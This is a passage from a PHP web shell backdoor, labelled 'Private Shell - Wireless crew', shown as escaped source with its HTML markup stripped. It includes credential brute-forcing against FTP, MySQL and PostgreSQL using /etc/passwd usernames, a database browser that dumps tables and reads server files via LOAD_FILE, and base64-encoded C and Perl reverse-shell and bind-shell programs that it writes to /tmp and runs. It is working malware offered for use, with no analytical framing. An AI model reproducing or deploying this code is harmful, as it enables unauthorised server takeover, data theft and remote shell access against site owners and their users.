>\\\"> send using AJAX
\\\'; echo \\\'
\\\'; printFooter(); } function actionLogout() { unset($_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\'])]); echo \\\'bye!\\\'; } function actionSelfRemove() { printHeader(); if($_POST[\\\'p1\\\'] == \\\'yes\\\') { if(@unlink(SELF_PATH)) die(\\\'Shell has been removed\\\'); else echo \\\'unlink error!\\\'; } echo \\\'

Suicide

Really want to remove the shell?
Yes
\\\'; printFooter(); } function actionBruteforce() { printHeader(); if( isset($_POST[\\\'proto\\\']) ) { echo \\\'

Results

Type: \\\'.htmlspecialchars($_POST[\\\'proto\\\']).\\\' Server: \\\'.htmlspecialchars($_POST[\\\'server\\\']).\\\'
\\\'; if( $_POST[\\\'proto\\\'] == \\\'ftp\\\' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST[\\\'proto\\\'] == \\\'mysql\\\' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.\\\':\\\'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST[\\\'proto\\\'] == \\\'pgsql\\\' ) { function bruteForce($ip,$port,$login,$pass) { $str = \\\"host=\\\'\\\".$ip.\\\"\\\' port=\\\'\\\".$port.\\\"\\\' user=\\\'\\\".$login.\\\"\\\' password=\\\'\\\".$pass.\\\"\\\' dbname=\\\'\\\'\\\"; $res = @pg_connect($server[0].\\\':\\\'.$server[1]?$server[1]:5432, $login, $pass); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(\\\":\\\", $_POST[\\\'server\\\']); if($_POST[\\\'type\\\'] == 1) { $temp = @file(\\\'/etc/passwd\\\'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(\\\":\\\", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo \\\'\\\'.htmlspecialchars($line[0]).\\\':\\\'.htmlspecialchars($line[0]).\\\'
\\\'; } if(@$_POST[\\\'reverse\\\']) { $tmp = \\\"\\\"; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo \\\'\\\'.htmlspecialchars($line[0]).\\\':\\\'.htmlspecialchars($tmp); } } } } elseif($_POST[\\\'type\\\'] == 2) { $temp = @file($_POST[\\\'dict\\\']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST[\\\'login\\\'], $line) ) { $success++; echo \\\'\\\'.htmlspecialchars($_POST[\\\'login\\\']).\\\':\\\'.htmlspecialchars($line).\\\'
\\\'; } } } echo \\\"Attempts: $attempts Success: $success

\\\"; } echo \\\'

FTP bruteforce

\\\' .\\\'\\\' .\\\'\\\' .\\\'\\\' .\\\'\\\' .\\\'\\\' .\\\'\\\' .\\\'
Type
\\\' .\\\'\\\' .\\\'\\\' .\\\'\\\' .\\\'Server:port
Brute type
\\\' .\\\'\\\' .\\\'\\\' .\\\'
Login
Dictionary
\\\' .\\\'
>\\\">
\\\'; echo \\\'

\\\'; printFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \\\'mysql\\\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case \\\'pgsql\\\': $host = explode(\\\':\\\', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect(\\\"host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname\\\") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case \\\'mysql\\\': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case \\\'mysql\\\': return $this->res = @mysql_query($str); break; case \\\'pgsql\\\': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case \\\'mysql\\\': return @mysql_fetch_assoc($res); break; case \\\'pgsql\\\': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case \\\'mysql\\\': return $this->res = @mysql_list_dbs($this->link); break; case \\\'pgsql\\\': return $this->res = $this->query(\\\"SELECT datname FROM pg_database\\\"); break; } return false; } function listTables() { switch($this->type) { case \\\'mysql\\\': return $this->res = $this->query(\\\'SHOW TABLES\\\'); break; case \\\'pgsql\\\': return $this->res = $this->query(\\\"select table_name from information_schema.tables where (table_schema != \\\'information_schema\\\' AND table_schema != \\\'pg_catalog\\\') or table_name = \\\'pg_user\\\'\\\"); break; } return false; } function error() { switch($this->type) { case \\\'mysql\\\': return @mysql_error($this->link); break; case \\\'pgsql\\\': return @pg_last_error($this->link); break; } return false; } function setCharset($str) { switch($this->type) { case \\\'mysql\\\': if(function_exists(\\\'mysql_set_charset\\\')) return @mysql_set_charset($str, $this->link); else $this->query(\\\'SET CHARSET \\\'.$str); break; case \\\'mysql\\\': return @pg_set_client_encoding($this->link, $str); break; } return false; } function dump($table) { switch($this->type) { case \\\'mysql\\\': $res = $this->query(\\\'SHOW CREATE TABLE `\\\'.$table.\\\'`\\\'); $create = mysql_fetch_array($res); echo $create[1].\\\";\\\\n\\\\n\\\"; $this->query(\\\'SELECT * FROM `\\\'.$table.\\\'`\\\'); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = \\\"\\\'\\\".@mysql_real_escape_string($v).\\\"\\\'\\\"; $columns[] = \\\"`\\\".$k.\\\"`\\\"; } echo \\\'INSERT INTO `\\\'.$table.\\\'` (\\\'.implode(\\\", \\\", $columns).\\\') VALUES (\\\'.implode(\\\", \\\", $item).\\\');\\\'.\\\"\\\\n\\\"; } break; case \\\'pgsql\\\': $this->query(\\\'SELECT * FROM \\\'.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = \\\"\\\'\\\".addslashes($v).\\\"\\\'\\\"; $columns[] = $k; } echo \\\'INSERT INTO \\\'.$table.\\\' (\\\'.implode(\\\", \\\", $columns).\\\') VALUES (\\\'.implode(\\\", \\\", $item).\\\');\\\'.\\\"\\\\n\\\"; } break; } return false; } }; $db = new DbClass($_POST[\\\'type\\\']); if(@$_POST[\\\'p2\\\']==\\\'download\\\') { ob_start(\\\"ob_gzhandler\\\", 4096); $db->connect($_POST[\\\'sql_host\\\'], $_POST[\\\'sql_login\\\'], $_POST[\\\'sql_pass\\\'], $_POST[\\\'sql_base\\\']); $db->selectdb($_POST[\\\'sql_base\\\']); header(\\\"Content-Disposition: attachment; filename=dump.sql\\\"); header(\\\"Content-Type: text/plain\\\"); foreach($_POST[\\\'tbl\\\'] as $v) $db->dump($v); exit; } printHeader(); ?>

Sql browser

\\\'> \\\'>
Type Host Login Password Database
\\\'> \\\'> \\\'> \\\"; if(isset($_POST[\\\'sql_host\\\'])){ if($db->connect($_POST[\\\'sql_host\\\'], $_POST[\\\'sql_login\\\'], $_POST[\\\'sql_pass\\\'], $_POST[\\\'sql_base\\\'])) { switch($_POST[\\\'charset\\\']) { case \\\"Windows-1251\\\": $db->setCharset(\\\'cp1251\\\'); break; case \\\"UTF-8\\\": $db->setCharset(\\\'utf8\\\'); break; case \\\"KOI8-R\\\": $db->setCharset(\\\'koi8r\\\'); break; case \\\"KOI8-U\\\": $db->setCharset(\\\'koi8u\\\'); break; case \\\"cp866\\\": $db->setCharset(\\\'cp866\\\'); break; } $db->listDbs(); echo \\\"\\\'; } else echo $tmp; }else echo $tmp; ?> >\\\">
link){ echo \\\"
\\\"; if(!empty($_POST[\\\'sql_base\\\'])){ $db->selectdb($_POST[\\\'sql_base\\\']); echo \\\"\\\"; } echo \\\"
Tables:

\\\"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); $n = $db->fetch($db->query(\\\'SELECT COUNT(*) as n FROM \\\'.$value.\\\'\\\')); $value = htmlspecialchars($value); echo \\\" \\\".$value.\\\" (\\\".$n[\\\'n\\\'].\\\")
\\\"; } echo \\\"
\\\"; if(@$_POST[\\\'p1\\\'] == \\\'select\\\') { $_POST[\\\'p1\\\'] = \\\'query\\\'; $db->query(\\\'SELECT COUNT(*) as n FROM \\\'.$_POST[\\\'p2\\\'].\\\'\\\'); $num = $db->fetch(); $num = $num[\\\'n\\\']; echo \\\"\\\".$_POST[\\\'p2\\\'].\\\" ($num) \\\"; for($i=0;$i<($num/30);$i++) if($i != (int)$_POST[\\\'p3\\\']) echo \\\"\\\",($i+1),\\\" \\\"; else echo ($i+1),\\\" \\\"; if($_POST[\\\'type\\\']==\\\'pgsql\\\') $_POST[\\\'p3\\\'] = \\\'SELECT * FROM \\\'.$_POST[\\\'p2\\\'].\\\' LIMIT 30 OFFSET \\\'.($_POST[\\\'p3\\\']*30); else $_POST[\\\'p3\\\'] = \\\'SELECT * FROM `\\\'.$_POST[\\\'p2\\\'].\\\'` LIMIT \\\'.($_POST[\\\'p3\\\']*30).\\\',30\\\'; echo \\\"

\\\"; } if((@$_POST[\\\'p1\\\'] == \\\'query\\\') && !empty($_POST[\\\'p3\\\'])) { $db->query(@$_POST[\\\'p3\\\']); if($db->res !== false) { $title = false; echo \\\'\\\'; $line = 1; while($item = $db->fetch()) { if(!$title) { echo \\\'\\\'; foreach($item as $key => $value) echo \\\'\\\'; reset($item); $title=true; echo \\\'\\\'; $line = 2; } echo \\\'\\\'; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo \\\'\\\'; else echo \\\'\\\'; } echo \\\'\\\'; } echo \\\'
\\\'.$key.\\\'
null\\\'.nl2br(htmlspecialchars($value)).\\\'
\\\'; } else { echo \\\'
Error: \\\'.htmlspecialchars($db->error()).\\\'
\\\'; } } echo \\\"

\\\"; echo \\\"

Load file >\\\'>
\\\"; if(@$_POST[\\\'p1\\\'] == \\\'loadfile\\\') { $db->query(\\\"SELECT LOAD_FILE(\\\'\\\".addslashes($_POST[\\\'p2\\\']).\\\"\\\') as file\\\"); $file = $db->fetch(); echo \\\'
\\\'.htmlspecialchars($file[\\\'file\\\']).\\\'
\\\'; } } echo \\\'
\\\'; printFooter(); } function actionNetwork() { printHeader(); $back_connect_c=\\\"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9\\\"; $back_connect_p=\\\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7\\\"; $bind_port_c=\\\"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9\\\"; $bind_port_p=\\\"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=\\\"; ?>

Network tools

Bind port to /bin/sh
Port: Password: Using: >\\\">
Back-connect to
Server: \\\'> Port: Using: >\\\">

$out\\\\n\\\".ex(\\\"ps aux | grep bp\\\").\\\"\\\"; } if($_POST[\\\'p1\\\'] == \\\'bpp\\\') { cf(\\\"/tmp/bp.pl\\\",$bind_port_p); $out = ex(which(\\\"perl\\\").\\\" /tmp/bp.pl \\\".$_POST[\\\'p2\\\'].\\\" &\\\"); echo \\\"
$out\\\\n\\\".ex(\\\"ps aux | grep bp.pl\\\").\\\"
\\\"; } if($_POST[\\\'p1\\\'] == \\\'bcc\\\') { cf(\\\"/tmp/bc.c\\\",$back_connect_c); $out = ex(\\\"gcc -o /tmp/bc /tmp/bc.c\\\"); @unlink(\\\"/tmp/bc.c\\\"); $out .= ex(\\\"/tmp/bc \\\".$_POST[\\\'p2\\\'].\\\" \\\".$_POST[\\\'p3\\\'].\\\" &\\\"); echo \\\"
$out\\\\n\\\".ex(\\\"ps aux | grep bc\\\").\\\"
\\\"; } if($_POST[\\\'p1\\\'] == \\\'bcp\\\') { cf(\\\"/tmp/bc.pl\\\",$back_connect_p); $out = ex(which(\\\"perl\\\").\\\" /tmp/bc.pl \\\".$_POST[\\\'p2\\\'].\\\" \\\".$_POST[\\\'p3\\\'].\\\" &\\\"); echo \\\"
$out\\\\n\\\".ex(\\\"ps aux | grep bc.pl\\\").\\\"
\\\"; } } echo \\\'
\\\'; printFooter(); } if( empty($_POST[\\\'a\\\']) ) if(isset($default_action) && function_exists(\\\'action\\\' . $default_action)) $_POST[\\\'a\\\'] = $default_action; else $_POST[\\\'a\\\'] = \\\'SecInfo\\\'; if( !empty($_POST[\\\'a\\\']) && function_exists(\\\'action\\\' . $_POST[\\\'a\\\']) ) call_user_func(\\\'action\\\' . $_POST[\\\'a\\\']); ?>
Private Shell - Wireless crew © Copyleft 2009 -Pro_Wikileaks
Hacker-newbie.org